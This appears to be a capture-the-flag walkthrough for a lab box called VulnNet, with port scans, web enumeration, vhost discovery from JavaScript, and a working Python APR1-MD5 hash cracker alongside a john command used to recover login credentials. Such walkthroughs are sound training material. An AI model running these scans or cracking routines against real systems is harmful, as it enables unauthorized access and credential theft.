VulnNet
Can you take advantage of the misconfigurations made by VulnNet Entertainment?
Enumeration
1) masscan: masscan -e eth0 -p 1-65535 --rate=10000 10.10.186.105
Discovered open port 22/tcp on 10.10.186.105
Discovered open port 80/tcp on 10.10.186.105
2) nmap: nmap -sV -sC -p 22,80 -v 10.10.186.105
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
| 256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
|_ 256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (EdDSA)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet
3) gobuster:
/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
4) nikto finds a login page (/login.html) and directory indexing on /img/:
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /LICENSE.txt, fields: 0x455 0x5b995f090f3a1
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
6) LICENSE.txt names zlib and its version, but that version is not vulnerable, so this is a dead end.
7) The /js directory lists .js files; reading them turns up these strings:
pip3 install -r requirement.txt
http://vulnnet.thm/index.php?referer=
http://broadcast.vulnnet.thm
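The hostname and parameter discovery in step 7, automated. This is an added example for this writeup, not code from the box or the original post; JS_SAMPLE is a constructed stand-in for the real .js file that contains the same two URLs, and 10.10.186.105 is the target address from the scans above.

```python
#!/usr/bin/env python3
"""Pull hostnames for the target domain out of client-side JavaScript,
build the /etc/hosts line they need, and list query parameters worth
testing by hand. Added example, not the box's own JavaScript."""
import re
from urllib.parse import urlsplit

# Constructed sample: the two vulnnet.thm URLs are the ones the writeup
# found in the real file; the CDN line is filler the filter must ignore.
JS_SAMPLE = """
var cdn = "https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js";
var ref = "http://vulnnet.thm/index.php?referer=";
var live = "http://broadcast.vulnnet.thm";
"""

# Absolute http(s) URLs, stopping at quotes, whitespace and closing brackets.
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")


def extract_urls(text):
    return URL_RE.findall(text)


def target_hosts(text, domain):
    """Hostnames equal to `domain` or under it, deduplicated, in order seen.
    Names that appear here but do not resolve publicly are vhost candidates."""
    seen = []
    for url in extract_urls(text):
        host = urlsplit(url).hostname
        if host and (host == domain or host.endswith("." + domain)) and host not in seen:
            seen.append(host)
    return seen


def hosts_line(ip, hostnames):
    """One /etc/hosts line mapping every discovered vhost to the target."""
    return ip + " " + " ".join(hostnames)


def query_params(text):
    """Parameter names seen in the URLs (referer= is the one to poke at)."""
    params = []
    for url in extract_urls(text):
        for part in urlsplit(url).query.split("&"):
            name = part.split("=", 1)[0]
            if name and name not in params:
                params.append(name)
    return params


if __name__ == "__main__":
    hosts = target_hosts(JS_SAMPLE, "vulnnet.thm")
    print(hosts_line("10.10.186.105", hosts))
    print("parameters to test:", query_params(JS_SAMPLE))
```

Run it against the real file with `curl -s http://10.10.186.105/js/<file>.js | python3 -c '...'` style piping, or just paste the file contents into JS_SAMPLE; the printed line goes straight into /etc/hosts.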
9) I need to add broadcast.vulnnet.thm (and vulnnet.thm) to /etc/hosts pointing at 10.10.186.105, since neither name resolves on its own; then it shows:
11) Searching for passwords in common files turns up an Apache htpasswd entry ($apr1$ is the APR1-MD5 format; john treats it as md5crypt, hashcat as mode 1600):
developers:$apr1$ntOz2ERF$..................
Exploitation
12) Cracking the hash (the $apr1$ line saved to a file named hash): john hash --wordlist=/usr/share/wordlists/rockyou.txt
13) Using these credentials, I can log in to broadcast.vulnnet.thm.
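Steps 11 to 13 as one offline script: a pure-Python implementation of APR1-MD5 (the $apr1$ htpasswd format) and a dictionary attack over it, which is what john does for this hash under its md5crypt format. This is an added example, not part of the original writeup; because the page only shows a truncated hash, the target line is constructed here from the page's salt ntOz2ERF and an assumed password, and the wordlist is a short inline list standing in for rockyou.txt.

```python
#!/usr/bin/env python3
"""Offline dictionary attack on an Apache htpasswd ($apr1$) entry.
Added example for this writeup; the target line is constructed with this
script's own apr1_md5() because the page shows only a truncated hash."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$apr1$"


def _to64(value, count):
    """Apache's crypt-style base64: 6 bits at a time, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_md5(password: bytes, salt: bytes) -> str:
    """APR1-MD5 as in apr_md5_encode(): md5crypt with the $apr1$ magic and
    1000 stretching rounds. Salt is at most 8 characters."""
    salt = salt[:8]
    ctx = hashlib.md5(password + MAGIC + salt)
    alt = hashlib.md5(password + salt + password).digest()
    for n in range(len(password), 0, -16):
        ctx.update(alt[:min(16, n)])
    n = len(password)
    while n:                       # one byte per bit of len(password)
        ctx.update(b"\0" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):          # the deliberately slow part
        c = hashlib.md5()
        c.update(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in order)
    enc += _to64(final[11], 2)
    return (MAGIC + salt).decode() + "$" + enc


def parse_htpasswd_line(line):
    """'user:$apr1$salt$hash' -> (user, salt bytes, full hash string)."""
    user, hashval = line.strip().split(":", 1)
    fields = hashval.split("$")
    if len(fields) != 4 or fields[1] != "apr1":
        raise ValueError("not an $apr1$ htpasswd entry")
    return user, fields[2].encode(), hashval


def crack(line, wordlist):
    """Try each candidate with the entry's own salt; return (user, password|None)."""
    user, salt, target = parse_htpasswd_line(line)
    for word in wordlist:
        if apr1_md5(word.encode(), salt) == target:
            return user, word
    return user, None


if __name__ == "__main__":
    # Constructed target: the page's salt with an assumed password.
    target_line = "developers:" + apr1_md5(b"letmein", b"ntOz2ERF")
    candidates = ["password", "123456", "qwerty", "letmein"]   # stand-in for rockyou.txt
    print(crack(target_line, candidates))
```

Before trusting it on a real hash, generate a line with `htpasswd -nbm someuser somepass` and confirm crack() recovers somepass. The 1000-round loop makes pure Python far slower than john or hashcat -m 1600, so for a rockyou-sized list hand the line to those; this script is for understanding the format and for checking a single candidate.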